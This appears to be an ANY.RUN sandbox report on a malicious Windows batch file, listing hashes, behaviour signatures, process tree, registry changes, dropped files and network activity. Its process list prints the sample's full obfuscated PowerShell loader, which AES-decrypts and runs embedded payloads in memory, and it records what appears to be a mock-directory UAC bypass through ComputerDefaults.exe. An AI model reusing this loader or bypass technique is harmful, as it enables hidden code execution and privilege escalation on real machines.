analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

3cb4d9bb4d3100fb7884a96c4c1cc4ffe4994c76e80626e2ca4894a01cb6ded2.bat

Full analysis: https://app.any.run/tasks/a6791bad-7f35-4717-bdcc-0d9023639181
Verdict: Malicious activity
Analysis date: May 24, 2024, 18:44:03
OS: Windows 10 Professional (build: 19045, 64 bit)
Indicators:
MIME: text/x-msdos-batch
File info: DOS batch file, ASCII text, with very long lines (58340), with CRLF line terminators
MD5:

81E3209CF09A8F2F59C94C3E8C20C475

SHA1:

0E05DFA84C0F053AB8F2FC4682FB46E02440096F

SHA256:

3CB4D9BB4D3100FB7884A96C4C1CC4FFE4994C76E80626E2CA4894A01CB6DED2

SSDEEP:

6144:xlN/X/N7ZeoXGyzjFk7ecPTja3UIhdcYGuukwEZrWAFhF7EP4:zNf1H2yzjFk7e6ToUmdcYFukwE5Wyh6w

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 6276)
    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 6208)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 6276)
    • Uses AES cipher (POWERSHELL)

      • powershell.exe (PID: 6276)
    • Gets or sets the initialization vector for the symmetric algorithm (POWERSHELL)

      • powershell.exe (PID: 6276)
    • Gets or sets the symmetric key that is used for encryption and decryption (POWERSHELL)

      • powershell.exe (PID: 6276)
    • Drops the executable file immediately after the start

      • powershell.exe (PID: 6276)
  • SUSPICIOUS

    • Cryptography encrypted command line is found

      • cmd.exe (PID: 6268)
    • Application launched itself

      • cmd.exe (PID: 6208)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 6208)
    • Executing commands from a ".bat" file

      • cmd.exe (PID: 6208)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 6208)
      • ComputerDefaults.exe (PID: 6536)
    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 6208)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 6276)
    • Process drops legitimate windows executable

      • powershell.exe (PID: 6276)
    • Reads security settings of Internet Explorer

      • ComputerDefaults.exe (PID: 6536)
    • Executing commands from ".cmd" file

      • ComputerDefaults.exe (PID: 6536)
  • INFO

    • Checks current location (POWERSHELL)

      • powershell.exe (PID: 6276)
    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 6276)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 6276)
    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 6276)
    • Checks supported languages

      • ComputerDefaults.exe (PID: 6536)
    • Reads the computer name

      • ComputerDefaults.exe (PID: 6536)
    • Reads Microsoft Office registry keys

      • ComputerDefaults.exe (PID: 6536)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
134
Monitored processes
8
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start cmd.exe no specs conhost.exe no specs cmd.exe no specs powershell.exe computerdefaults.exe no specs computerdefaults.exe cmd.exe no specs conhost.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
6208C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\3cb4d9bb4d3100fb7884a96c4c1cc4ffe4994c76e80626e2ca4894a01cb6ded2.bat" "C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
6216\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6268C:\WINDOWS\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PB3G/iXD5R10HYv1dkYf6wvlc6H16dkTeRAJtBSn4LU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('LsLXFtmysUAoPLv6r6Ueaw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $puoml=New-Object System.IO.MemoryStream(,$param_var); $JwzSg=New-Object System.IO.MemoryStream; $swRQi=New-Object System.IO.Compression.GZipStream($puoml, [IO.Compression.CompressionMode]::Decompress); $swRQi.CopyTo($JwzSg); $swRQi.Dispose(); $puoml.Dispose(); $JwzSg.Dispose(); $JwzSg.ToArray();}function execute_function($param_var,$param2_var){ $OFffA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $wgpwT=$OFffA.EntryPoint; $wgpwT.Invoke($null, $param2_var);}$VTLPA = 'C:\Users\admin\AppData\Local\Temp\3cb4d9bb4d3100fb7884a96c4c1cc4ffe4994c76e80626e2ca4894a01cb6ded2.bat';$host.UI.RawUI.WindowTitle = $VTLPA;$Rstmc=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($VTLPA).Split([Environment]::NewLine);foreach ($lJDHS in $Rstmc) { if ($lJDHS.StartsWith('liHqZhZshpaeOVfbWRwH')) { $PDXzy=$lJDHS.Substring(20); break; }}$payloads_var=[string[]]$PDXzy.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "C:\Windows\System32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
6276"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypassC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
4294967295
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
6480"C:\Windows \System32\ComputerDefaults.exe" "C:\Users\admin\AppData\Local\Temp\3cb4d9bb4d3100fb7884a96c4c1cc4ffe4994c76e80626e2ca4894a01cb6ded2.bat"C:\Windows \System32\ComputerDefaults.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Set Program Access and Computer Defaults Control Panel
Exit code:
3221226540
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows \system32\computerdefaults.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
6536"C:\Windows \System32\ComputerDefaults.exe" "C:\Users\admin\AppData\Local\Temp\3cb4d9bb4d3100fb7884a96c4c1cc4ffe4994c76e80626e2ca4894a01cb6ded2.bat"C:\Windows \System32\ComputerDefaults.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Set Program Access and Computer Defaults Control Panel
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows \system32\computerdefaults.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\advapi32.dll
6640cmd.exe /c call SC.cmdC:\Windows\SysWOW64\cmd.exeComputerDefaults.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
6676\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
6 851
Read events
6 842
Write events
9
Delete events
0

Modification events

(PID) Process:(6276) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(6276) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(6276) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(6276) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(6536) ComputerDefaults.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Operation:writeName:SlowContextMenuEntries
Value:
6024B221EA3A6910A2DC08002B30309D0A010000BD0E0C47735D584D9CEDE91E22E23282770100000114020000000000C0000000000000468D0000006078A409B011A54DAFA526D86198A780390100009AD298B2EDA6DE11BA8CA68E55D895936E000000
Executable files
2
Suspicious files
1
Text files
3
Unknown types
0

Dropped files

PID
Process
Filename
Type
6276powershell.exeC:\Users\admin\AppData\Local\Temp\SC.battext
MD5:81E3209CF09A8F2F59C94C3E8C20C475
SHA256:3CB4D9BB4D3100FB7884A96C4C1CC4FFE4994C76E80626E2CA4894A01CB6DED2
6276powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactivebinary
MD5:B305528CA5FDB3A3FB65D285F46E953C
SHA256:59FB207DC632634FA9C2061D5F597988AB5A1F2C0CB9388CC10C6C81FF1F2F94
6276powershell.exeC:\Windows \System32\MLANG.dllexecutable
MD5:134E4637B17B5F55AA8A0BE586A3CB4F
SHA256:C3B2425DB3762B1378CF9772A7E6FAF0DE19DD4AE8160AC7325F97FC249075D6
6276powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_zoevfblc.zwv.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6276powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_qo3kisnn.brm.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6276powershell.exeC:\Windows \System32\ComputerDefaults.exeexecutable
MD5:CFA65B13918526579371C138108A7DDB
SHA256:4C70FEA1C4F9B78955EB840C11C6C81F1D860485E090526A8E8176D98B1BE3D6
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
56
DNS requests
15
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2392
svchost.exe
GET
200
23.33.242.16:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
unknown
3688
SIHClient.exe
GET
200
23.33.242.16:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
unknown
4680
SearchApp.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAzlnDD9eoNTLi0BRrMy%2BWU%3D
unknown
unknown
3052
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
unknown
2392
svchost.exe
GET
200
23.73.138.163:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
unknown
3688
SIHClient.exe
GET
200
23.33.242.16:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
unknown
23.73.138.57:443
Akamai International B.V.
GB
unknown
23.73.138.131:443
Akamai International B.V.
GB
unknown
4364
svchost.exe
239.255.255.250:1900
unknown
2392
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
1744
RUXIMICS.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
5140
MoUsoCoreWorker.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
2392
svchost.exe
23.73.138.163:80
crl.microsoft.com
Akamai International B.V.
GB
unknown
2392
svchost.exe
23.33.242.16:80
www.microsoft.com
AKAMAI-AS
US
unknown
5140
MoUsoCoreWorker.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
  • 51.104.136.2
whitelisted
crl.microsoft.com
  • 23.73.138.163
  • 23.73.138.176
whitelisted
www.microsoft.com
  • 23.33.242.16
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
login.live.com
  • 40.126.32.138
  • 40.126.32.134
  • 40.126.32.68
  • 40.126.32.133
  • 20.190.160.14
  • 20.190.160.17
  • 40.126.32.74
  • 20.190.160.20
whitelisted
go.microsoft.com
  • 23.33.190.120
whitelisted
slscr.update.microsoft.com
  • 40.127.169.103
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 20.3.187.198
whitelisted
nexusrules.officeapps.live.com
  • 52.111.243.30
whitelisted
client.wns.windows.com
  • 40.113.103.199
whitelisted

Threats

No threats detected
No debug info